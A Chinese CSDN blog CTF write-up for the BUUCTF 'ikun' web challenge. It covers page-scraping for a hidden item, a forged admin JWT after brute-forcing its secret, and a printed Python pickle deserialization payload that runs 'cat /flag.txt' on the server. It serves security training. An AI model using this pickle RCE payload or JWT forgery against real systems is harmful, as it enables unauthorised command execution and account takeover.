[CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2024-06-14 09:50:01 发布
最新推荐文章于 2024-06-14 09:50:01 发布
阅读量499 收藏
点赞数 1
文章标签: python 安全 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/127128618
版权

[CISCN2019 华北赛区 Day1 Web2]ikun

首先在页面得到信息:
在这里插入图片描述

一定要买到lv6

通过python脚本找到lv6

import requests

for i in range(1,201):
    url='http://3c139326-f475-48d3-baec-f030d2fa8c9f.node4.buuoj.cn:81/shop?page='+str(i)
    result=requests.get(url).content.decode('utf-8')
    if 'lv6.png' in result:
        print(url)
        break

找到lv6在181的页面

在这里插入图片描述
提示有flag

注册账号后购买,发现钱不够可以修改打折优惠购买:

在这里插入图片描述

在这里插入图片描述
但只能admin访问:

在这里插入图片描述

利用burpsuite抓包得到:

发现有JWT:
在这里插入图片描述

利用工具爆破JWT的密钥:

在这里插入图片描述
爆破出来为: 1Kun

进行签名:

在这里插入图片描述

利用burpsuite修改发送:

在这里插入图片描述
得到:

在这里插入图片描述

查看源码发现网站源代码:

在这里插入图片描述
下载发现是Pickle反序列化

代码审计:

在这里插入图片描述

发现源码会尝试执行POST一个become的值,做为Pickle反序列化的字符

并将反序列化后的结果给res然后传给form.html页面回显:

在这里插入图片描述

我们可以利用Pickle反序列化构造命令执行

payload:

import pickle
import urllib
import commands
 
class payload(object):
    def __reduce__(self):
        return (commands.getoutput,('cat /flag.txt',)) 
 
a = payload()
print(urllib.quote(pickle.dumps(a)))

运行得到:

在这里插入图片描述

获取flag

在这里插入图片描述

参考博客:

https://blog.csdn.net/qq_58784379/article/details/124916710

南冥~
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8481
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
是爱坤你就来
[BUUCTF][CISCN2019 华北赛区 Day1 Web2]ikun
Y4tacker的博客
09-01 7301
文章目录知识点JWTPICKLEWP部分第一步找到lv6第二步BURP抓包修改pickel参考文章 知识点 JWT JWT相关 JWT解密网站 JWT破解利用工具 PICKLE Pickle模块中最常用的函数为: (1)pickle.dump(obj, file, [,protocol]) 函数的功能:将obj对象序列化存入已经打开的file中。 参数讲解: obj:想要序列化的obj对象。 file:文件名称。 protocol:序
BUUCTF-[CISCN2019 华北赛区 Day1 Web2]ikun
AndyNoel的博客
05-14 573
BUUCTF-[CISCN2019 华北赛区 Day1 Web2]ikun 鸡你太美 看一下网页 这段视频真不错!!!好了,看题 开始 让我们先注册一个账号,登陆后竟然有¥1000 ikun们冲鸭,一定要买到Lv6 让我们买到Lv6,上脚本找一下 import requests from time import * url="http://6777eeab-1fd2-4a3c-b124-d2ac0b67fd9b.node3.buuoj.cn/shop?page={}" for i in range(1
[CISCN2019 华北赛区 Day1 Web2]ikun 1
weixin_43940853的博客
03-16 561
写一个python脚本 import requests url = 'http://c8f78f51-2593-4b2a-8e72-f39543bc99dd.node3.buuoj.cn/shop?page={}' for i in range(1000): r = requests.get(url.format(str(i))) if 'lv6.png' in r.text: ...
[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化
sGanYu
05-22 1232
这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤 先去注册一个账户 注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了 这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p
ikun.exe
10-19
ikun.exe
ikun电脑桌面宠物.exe
09-22
ikun电脑桌面宠物.exe
GT2大师探索版C02ROOT工具箱-1.exe
11-24
GT2大师探索版C02ROOT工具箱-1.exe
测试一下你是不是IKUN
10-05
代码秀:你干嘛!!!哎呦!!!
基于JavaScript 如何实现爬山算法以及优化方案
乐闻世界
06-10 1367
爬山算法(Hill Climbing Algorithm)是一种常见的启发式搜索算法,常用于解决优化问题。其核心思想是从一个初始状态出发,通过逐步选择使目标函数值增大的邻近状态来寻找最优解。接下来,我们将通过 JavaScript 实现一个简单的爬山算法,帮助大家理解其原理和应用。从一个初始状态开始。评估当前状态的目标函数值。在当前状态的邻居中选择一个目标函数值更大的状态。如果找到了更优的邻居,则移动到该邻居并重复步骤2和步骤3。如果没有更优的邻居,则算法结束,当前状态即为局部最优解。
2024.6.13刷题记录
最新发布
lshx4658的博客
06-14 443
当时没有想到怎么保证队内全都是窗口内的元素,答案:“当队头元素在窗口的左边的时候,弹出队头”,虽然不能保证队内一直没有窗口外的元素,但是能保证使用到的队内元素(队头)全是窗口内元素。当时是有想到这个方法的,但是以为不行,一下没转过来弯。队列储存索引而不是元素,通过储存索引使我们能够快速判断元素是否出窗口。不会,思路来自题解(
Java——简单图书管理系统
m0_74100417的博客
06-09 1543
数据类型变量iffor数组方法类和对象封装继承多态抽象类和接口今天就是把上述知识点全部都用起来 图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理
python迁移数据教程
2402_85292291的博客
06-13 636
if os.path.isfile(src_item_path): dest_item_path = os.path.join(dest_folder, item) shutil.copy2(src_item_path, dest_item_path) # 如果item是目录,递归调用migrate_data函数。2. 准备源文件夹和目标文件夹: 在您的计算机上创建两个文件夹,分别为源文件夹(source_folder)和目标文件夹(destination_folder)。将您希望迁移的数据放入源文件夹。
YesPMP探索Python在生活中的应用,助力提升开发效率
YesPMP20的博客
06-13 736
Python是一种简单易学、高效强大的编程语言,正变成越来越多人选择的热门技能。学习Python不仅可以提供更多就业机会,还能让自己在职场更加有竞争力,那可以去哪里拓展自己的技能呢?
Python | Leetcode Python题解之第149题直线上最多的点数
Mopes__的博客
06-14 411
Python | Leetcode Python题解之第149题直线上最多的点数
每日一题42:最小化字符串长度
m0_63227758的博客
06-14 417
创建集合s = set() # 创建一个空集合s = {1, 2, 3} # 创建一个包含元素 1, 2, 3 的集合s = set([1, 2, 3]) # 通过列表创建集合# 添加和删除元素s.add(4) # 向集合中添加元素 4s.remove(3) # 从集合中删除元素 3,如果元素不存在则会引发 KeyErrors.discard(2) # 从集合中删除元素 2,如果元素不存在也不会报错# 集合运算intersection = s1 & s2 # 交集。
深入理解Python多进程
这家伙很懒,什么都没有留下
06-12 705
本文深入介绍了Python多进程编程的基础概念、实现原理、使用方法以及实战案例。通过本文的学习,读者可以全面理解和掌握Python多进程编程的相关知识,并能够在实际项目中应用多进程技术来提高程序的执行效率。需要注意的是,虽然多进程技术能够带来性能上的提升,但也会带来一些额外的问题和复杂性,如进程间通信、进程同步等。因此,在使用多进程技术时,需要根据实际情况进行权衡和选择。
ikun python
10-08
ikun python是指使用Python编写的一些项目或功能,其中包括ikun飞机大战和ikun音乐播放器。ikun飞机大战是一个使用Python和tkinter库开发的游戏,而ikun音乐播放器则是使用Python的tkinter和pygame库开发的一个音乐...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值